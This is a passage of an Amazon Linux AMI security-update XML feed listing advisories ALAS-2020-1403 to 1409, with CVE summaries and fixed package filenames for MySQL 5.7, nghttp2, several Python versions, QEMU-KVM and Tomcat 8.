name="mysql56-devel" version="5.6.49" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-devel-5.6.49-1.37.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1403</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1403: medium priority package update for mysql57</title><issued date="2020-07-27 23:17:00" /><updated date="2020-07-29 21:40:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-2814:
Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 5.6.47 and prior, 5.7.28 and prior and 8.0.18 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1830060: CVE-2020-2814 mysql: InnoDB unspecified vulnerability (CPU Apr 2020)
CVE-2020-2812:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Stored Procedure). Supported versions that are affected are 5.6.47 and prior, 5.7.29 and prior and 8.0.19 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1830059: CVE-2020-2812 mysql: Server: Stored Procedure unspecified vulnerability (CPU Apr 2020)
CVE-2020-2804:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Memcached). Supported versions that are affected are 5.6.47 and prior, 5.7.29 and prior and 8.0.19 and prior. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 5.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H).
1830058: CVE-2020-2804 mysql: Server: Memcached unspecified vulnerability (CPU Apr 2020)
CVE-2020-2780:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DML). Supported versions that are affected are 5.6.47 and prior, 5.7.29 and prior and 8.0.19 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1830056: CVE-2020-2780 mysql: Server: DML unspecified vulnerability (CPU Apr 2020)
CVE-2020-2765:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 5.7.29 and prior and 8.0.19 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1830052: CVE-2020-2765 mysql: Server: Optimizer unspecified vulnerability (CPU Apr 2020)
CVE-2020-2763:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Replication). Supported versions that are affected are 5.6.47 and prior, 5.7.29 and prior and 8.0.19 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1830051: CVE-2020-2763 mysql: Server: Replication unspecified vulnerability (CPU Apr 2020)
CVE-2020-2760:
Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 5.7.29 and prior and 8.0.19 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 5.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H).
1830082: CVE-2020-2760 mysql: InnoDB unspecified vulnerability (CPU Apr 2020)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2760" title="" id="CVE-2020-2760" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2763" title="" id="CVE-2020-2763" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2765" title="" id="CVE-2020-2765" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2780" title="" id="CVE-2020-2780" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2804" title="" id="CVE-2020-2804" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2812" title="" id="CVE-2020-2812" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2814" title="" id="CVE-2020-2814" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql57-test" version="5.7.30" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-test-5.7.30-1.15.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded" version="5.7.30" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-5.7.30-1.15.amzn1.x86_64.rpm</filename></package><package name="mysql57-common" version="5.7.30" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-common-5.7.30-1.15.amzn1.x86_64.rpm</filename></package><package name="mysql57-libs" version="5.7.30" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-libs-5.7.30-1.15.amzn1.x86_64.rpm</filename></package><package name="mysql57-devel" version="5.7.30" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-devel-5.7.30-1.15.amzn1.x86_64.rpm</filename></package><package name="mysql57-errmsg" version="5.7.30" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-errmsg-5.7.30-1.15.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.30" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-devel-5.7.30-1.15.amzn1.x86_64.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.30" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-debuginfo-5.7.30-1.15.amzn1.x86_64.rpm</filename></package><package name="mysql57-server" version="5.7.30" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-server-5.7.30-1.15.amzn1.x86_64.rpm</filename></package><package name="mysql57" version="5.7.30" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-5.7.30-1.15.amzn1.x86_64.rpm</filename></package><package name="mysql57-test" version="5.7.30" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-test-5.7.30-1.15.amzn1.i686.rpm</filename></package><package name="mysql57" version="5.7.30" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-5.7.30-1.15.amzn1.i686.rpm</filename></package><package name="mysql57-common" version="5.7.30" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-common-5.7.30-1.15.amzn1.i686.rpm</filename></package><package name="mysql57-embedded" version="5.7.30" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-5.7.30-1.15.amzn1.i686.rpm</filename></package><package name="mysql57-server" version="5.7.30" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-server-5.7.30-1.15.amzn1.i686.rpm</filename></package><package name="mysql57-errmsg" version="5.7.30" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-errmsg-5.7.30-1.15.amzn1.i686.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.30" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-devel-5.7.30-1.15.amzn1.i686.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.30" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-debuginfo-5.7.30-1.15.amzn1.i686.rpm</filename></package><package name="mysql57-devel" version="5.7.30" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-devel-5.7.30-1.15.amzn1.i686.rpm</filename></package><package name="mysql57-libs" version="5.7.30" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-libs-5.7.30-1.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1404</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1404: important priority package update for nghttp2</title><issued date="2020-07-27 23:18:00" /><updated date="2020-07-29 21:38:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-11080:
In nghttp2 before version 1.41.0, the overly large HTTP/2 SETTINGS frame payload causes denial of service. The proof of concept attack involves a malicious client constructing a SETTINGS frame with a length of 14,400 bytes (2400 individual settings entries) over and over again. The attack causes the CPU to spike at 100%. nghttp2 v1.41.0 fixes this vulnerability. There is a workaround to this vulnerability. Implement nghttp2_on_frame_recv_callback callback, and if received frame is SETTINGS frame and the number of settings entries are large (e.g., > 32), then drop the connection.
1844929: CVE-2020-11080 nghttp2: overly large SETTINGS frames can lead to DoS
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11080" title="" id="CVE-2020-11080" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libnghttp2-devel" version="1.33.0" release="1.1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libnghttp2-devel-1.33.0-1.1.6.amzn1.x86_64.rpm</filename></package><package name="nghttp2-debuginfo" version="1.33.0" release="1.1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/nghttp2-debuginfo-1.33.0-1.1.6.amzn1.x86_64.rpm</filename></package><package name="libnghttp2" version="1.33.0" release="1.1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libnghttp2-1.33.0-1.1.6.amzn1.x86_64.rpm</filename></package><package name="nghttp2" version="1.33.0" release="1.1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/nghttp2-1.33.0-1.1.6.amzn1.x86_64.rpm</filename></package><package name="libnghttp2" version="1.33.0" release="1.1.6.amzn1" epoch="0" arch="i686"><filename>Packages/libnghttp2-1.33.0-1.1.6.amzn1.i686.rpm</filename></package><package name="nghttp2-debuginfo" version="1.33.0" release="1.1.6.amzn1" epoch="0" arch="i686"><filename>Packages/nghttp2-debuginfo-1.33.0-1.1.6.amzn1.i686.rpm</filename></package><package name="nghttp2" version="1.33.0" release="1.1.6.amzn1" epoch="0" arch="i686"><filename>Packages/nghttp2-1.33.0-1.1.6.amzn1.i686.rpm</filename></package><package name="libnghttp2-devel" version="1.33.0" release="1.1.6.amzn1" epoch="0" arch="i686"><filename>Packages/libnghttp2-devel-1.33.0-1.1.6.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1406</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1406: medium priority package update for python26</title><issued date="2020-07-27 23:54:00" /><updated date="2020-07-29 21:38:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-8492:
Python 2.7 through 2.7.17, 3.5 through 3.5.9, 3.6 through 3.6.10, 3.7 through 3.7.6, and 3.8 through 3.8.1 allows an HTTP server to conduct Regular Expression Denial of Service (ReDoS) attacks against a client because of urllib.request.AbstractBasicAuthHandler catastrophic backtracking.
1809065: CVE-2020-8492 python: wrong backtracking in urllib.request.AbstractBasicAuthHandler allows for a ReDoS
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8492" title="" id="CVE-2020-8492" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python26-debuginfo" version="2.6.9" release="2.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-debuginfo-2.6.9-2.90.amzn1.x86_64.rpm</filename></package><package name="python26-devel" version="2.6.9" release="2.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-devel-2.6.9-2.90.amzn1.x86_64.rpm</filename></package><package name="python26-test" version="2.6.9" release="2.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-test-2.6.9-2.90.amzn1.x86_64.rpm</filename></package><package name="python26" version="2.6.9" release="2.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-2.6.9-2.90.amzn1.x86_64.rpm</filename></package><package name="python26-tools" version="2.6.9" release="2.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-tools-2.6.9-2.90.amzn1.x86_64.rpm</filename></package><package name="python26-libs" version="2.6.9" release="2.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-libs-2.6.9-2.90.amzn1.x86_64.rpm</filename></package><package name="python26" version="2.6.9" release="2.90.amzn1" epoch="0" arch="i686"><filename>Packages/python26-2.6.9-2.90.amzn1.i686.rpm</filename></package><package name="python26-debuginfo" version="2.6.9" release="2.90.amzn1" epoch="0" arch="i686"><filename>Packages/python26-debuginfo-2.6.9-2.90.amzn1.i686.rpm</filename></package><package name="python26-devel" version="2.6.9" release="2.90.amzn1" epoch="0" arch="i686"><filename>Packages/python26-devel-2.6.9-2.90.amzn1.i686.rpm</filename></package><package name="python26-libs" version="2.6.9" release="2.90.amzn1" epoch="0" arch="i686"><filename>Packages/python26-libs-2.6.9-2.90.amzn1.i686.rpm</filename></package><package name="python26-test" version="2.6.9" release="2.90.amzn1" epoch="0" arch="i686"><filename>Packages/python26-test-2.6.9-2.90.amzn1.i686.rpm</filename></package><package name="python26-tools" version="2.6.9" release="2.90.amzn1" epoch="0" arch="i686"><filename>Packages/python26-tools-2.6.9-2.90.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1407</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1407: medium priority package update for python27 python34 python35 python36</title><issued date="2020-07-27 23:54:00" /><updated date="2023-02-17 00:02:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-8492:
Python 2.7 through 2.7.17, 3.5 through 3.5.9, 3.6 through 3.6.10, 3.7 through 3.7.6, and 3.8 through 3.8.1 allows an HTTP server to conduct Regular Expression Denial of Service (ReDoS) attacks against a client because of urllib.request.AbstractBasicAuthHandler catastrophic backtracking.
CVE-2019-18348:
A CRLF injection flaw was discovered in python in the way URLs are handled when doing an HTTP/HTTPS connection (e.g. through urlopen() or HTTPConnection). An attacker who can control the url parameter passed to urlopen method in the urllib/urllib2 modules can inject CRLF sequences and HTTP headers by abusing the "host" part of the URL.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18348" title="" id="CVE-2019-18348" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8492" title="" id="CVE-2020-8492" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-debuginfo" version="2.7.18" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.18-1.138.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.18" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.18-1.138.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.18" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.18-1.138.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.18" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.18-1.138.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.18" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.18-1.138.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.18" release="1.138.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.18-1.138.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.18" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/python27-test-2.7.18-1.138.amzn1.i686.rpm</filename></package><package name="python27-tools" version="2.7.18" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.18-1.138.amzn1.i686.rpm</filename></package><package name="python27-libs" version="2.7.18" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.18-1.138.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.18" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.18-1.138.amzn1.i686.rpm</filename></package><package name="python27" version="2.7.18" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.18-1.138.amzn1.i686.rpm</filename></package><package name="python27-devel" version="2.7.18" release="1.138.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.18-1.138.amzn1.i686.rpm</filename></package><package name="python34-debuginfo" version="3.4.10" release="1.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-debuginfo-3.4.10-1.50.amzn1.x86_64.rpm</filename></package><package name="python34-test" version="3.4.10" release="1.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-test-3.4.10-1.50.amzn1.x86_64.rpm</filename></package><package name="python34-devel" version="3.4.10" release="1.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-devel-3.4.10-1.50.amzn1.x86_64.rpm</filename></package><package name="python34" version="3.4.10" release="1.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-3.4.10-1.50.amzn1.x86_64.rpm</filename></package><package name="python34-libs" version="3.4.10" release="1.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-libs-3.4.10-1.50.amzn1.x86_64.rpm</filename></package><package name="python34-tools" version="3.4.10" release="1.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-tools-3.4.10-1.50.amzn1.x86_64.rpm</filename></package><package name="python34" version="3.4.10" release="1.50.amzn1" epoch="0" arch="i686"><filename>Packages/python34-3.4.10-1.50.amzn1.i686.rpm</filename></package><package name="python34-debuginfo" version="3.4.10" release="1.50.amzn1" epoch="0" arch="i686"><filename>Packages/python34-debuginfo-3.4.10-1.50.amzn1.i686.rpm</filename></package><package name="python34-tools" version="3.4.10" release="1.50.amzn1" epoch="0" arch="i686"><filename>Packages/python34-tools-3.4.10-1.50.amzn1.i686.rpm</filename></package><package name="python34-devel" version="3.4.10" release="1.50.amzn1" epoch="0" arch="i686"><filename>Packages/python34-devel-3.4.10-1.50.amzn1.i686.rpm</filename></package><package name="python34-libs" version="3.4.10" release="1.50.amzn1" epoch="0" arch="i686"><filename>Packages/python34-libs-3.4.10-1.50.amzn1.i686.rpm</filename></package><package name="python34-test" version="3.4.10" release="1.50.amzn1" epoch="0" arch="i686"><filename>Packages/python34-test-3.4.10-1.50.amzn1.i686.rpm</filename></package><package name="python35-tools" version="3.5.7" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-tools-3.5.7-1.26.amzn1.x86_64.rpm</filename></package><package name="python35-devel" version="3.5.7" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-devel-3.5.7-1.26.amzn1.x86_64.rpm</filename></package><package name="python35" version="3.5.7" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-3.5.7-1.26.amzn1.x86_64.rpm</filename></package><package name="python35-debuginfo" version="3.5.7" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-debuginfo-3.5.7-1.26.amzn1.x86_64.rpm</filename></package><package name="python35-test" version="3.5.7" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-test-3.5.7-1.26.amzn1.x86_64.rpm</filename></package><package name="python35-libs" version="3.5.7" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-libs-3.5.7-1.26.amzn1.x86_64.rpm</filename></package><package name="python35-tools" version="3.5.7" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/python35-tools-3.5.7-1.26.amzn1.i686.rpm</filename></package><package name="python35-devel" version="3.5.7" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/python35-devel-3.5.7-1.26.amzn1.i686.rpm</filename></package><package name="python35-libs" version="3.5.7" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/python35-libs-3.5.7-1.26.amzn1.i686.rpm</filename></package><package name="python35-test" version="3.5.7" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/python35-test-3.5.7-1.26.amzn1.i686.rpm</filename></package><package name="python35-debuginfo" version="3.5.7" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/python35-debuginfo-3.5.7-1.26.amzn1.i686.rpm</filename></package><package name="python35" version="3.5.7" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/python35-3.5.7-1.26.amzn1.i686.rpm</filename></package><package name="python36-test" version="3.6.11" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-test-3.6.11-1.17.amzn1.x86_64.rpm</filename></package><package name="python36-tools" version="3.6.11" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-tools-3.6.11-1.17.amzn1.x86_64.rpm</filename></package><package name="python36" version="3.6.11" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-3.6.11-1.17.amzn1.x86_64.rpm</filename></package><package name="python36-debug" version="3.6.11" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debug-3.6.11-1.17.amzn1.x86_64.rpm</filename></package><package name="python36-devel" version="3.6.11" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-devel-3.6.11-1.17.amzn1.x86_64.rpm</filename></package><package name="python36-debuginfo" version="3.6.11" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debuginfo-3.6.11-1.17.amzn1.x86_64.rpm</filename></package><package name="python36-libs" version="3.6.11" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-libs-3.6.11-1.17.amzn1.x86_64.rpm</filename></package><package name="python36-libs" version="3.6.11" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/python36-libs-3.6.11-1.17.amzn1.i686.rpm</filename></package><package name="python36-devel" version="3.6.11" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/python36-devel-3.6.11-1.17.amzn1.i686.rpm</filename></package><package name="python36-debuginfo" version="3.6.11" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debuginfo-3.6.11-1.17.amzn1.i686.rpm</filename></package><package name="python36-tools" version="3.6.11" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/python36-tools-3.6.11-1.17.amzn1.i686.rpm</filename></package><package name="python36-debug" version="3.6.11" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debug-3.6.11-1.17.amzn1.i686.rpm</filename></package><package name="python36-test" version="3.6.11" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/python36-test-3.6.11-1.17.amzn1.i686.rpm</filename></package><package name="python36" version="3.6.11" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/python36-3.6.11-1.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1408</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1408: important priority package update for qemu-kvm</title><issued date="2020-07-27 23:58:00" /><updated date="2020-07-29 21:37:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-8608:
In libslirp 4.1.0, as used in QEMU 4.2.0, tcp_subr.c misuses snprintf return values, leading to a buffer overflow in later code.
1798453: CVE-2020-8608 QEMU: Slirp: potential OOB access due to unsafe snprintf() usages
CVE-2020-7039:
tcp_emu in tcp_subr.c in libslirp 4.1.0, as used in QEMU 4.2.0, mismanages memory, as demonstrated by IRC DCC commands in EMU_IRC. This can cause a heap-based buffer overflow or other out-of-bounds access which can lead to a DoS or potential execute arbitrary code.
1791551: CVE-2020-7039 QEMU: slirp: OOB buffer access while emulating tcp protocols in tcp_emu()
CVE-2019-9824:
tcp_emu in slirp/tcp_subr.c (aka slirp/src/tcp_subr.c) in QEMU 3.0.0 uses uninitialized data in an snprintf call, leading to Information disclosure.
1678515: CVE-2019-9824 QEMU: slirp: information leakage in tcp_emu() due to uninitialized stack variables
1678515:
CVE-2019-9824 QEMU: Slirp: information leakage in tcp_emu() due to uninitialized stack variables
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9824" title="" id="CVE-2019-9824" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7039" title="" id="CVE-2020-7039" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8608" title="" id="CVE-2020-8608" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="qemu-kvm-debuginfo" version="1.5.3" release="156.19.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-debuginfo-1.5.3-156.19.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm" version="1.5.3" release="156.19.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-1.5.3-156.19.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-tools" version="1.5.3" release="156.19.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-tools-1.5.3-156.19.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-common" version="1.5.3" release="156.19.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-common-1.5.3-156.19.amzn1.x86_64.rpm</filename></package><package name="qemu-img" version="1.5.3" release="156.19.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-img-1.5.3-156.19.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1409</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1409: important priority package update for tomcat8</title><issued date="2020-07-27 23:58:00" /><updated date="2020-07-29 21:35:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-13935:
The payload length in a WebSocket frame was not correctly validated in Apache Tomcat 10.0.0-M1 to 10.0.0-M6, 9.0.0.M1 to 9.0.36, 8.5.0 to 8.5.56 and 7.0.27 to 7.0.104. Invalid payload lengths could trigger an infinite loop. Multiple requests with invalid payload lengths could lead to a denial of service.
1857024: CVE-2020-13935 tomcat: multiple requests with invalid payload length in a WebSocket frame could lead to DoS
CVE-2020-13934:
An h2c direct connection to Apache Tomcat 10.0.0-M1 to 10.0.0-M6, 9.0.0.M5 to 9.0.36 and 8.5.1 to 8.5.56 did not release the HTTP/1.1 processor after the upgrade to HTTP/2. If a sufficient number of such requests were made, an OutOfMemoryException could occur leading to a denial of service.
1857040: CVE-2020-13934 tomcat: OutOfMemoryException caused by HTTP/2 connection leak could lead to DoS
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13934" title="" id="CVE-2020-13934" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13935" title="" id="CVE-2020-13935" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-log4j" version="8.5.57" release="1.85.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.5.57-1.85.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.5.57" release="1.85.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.57-1.85.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.5.57" release="1.85.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.5.57-1.85.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.5.57" release="1.85.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.57-1.85.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.5.57" release="1.85.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.5.57-1.85.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.57" release="1.85.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.5.57-1.85.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.5.57" release="1.85.amzn1" 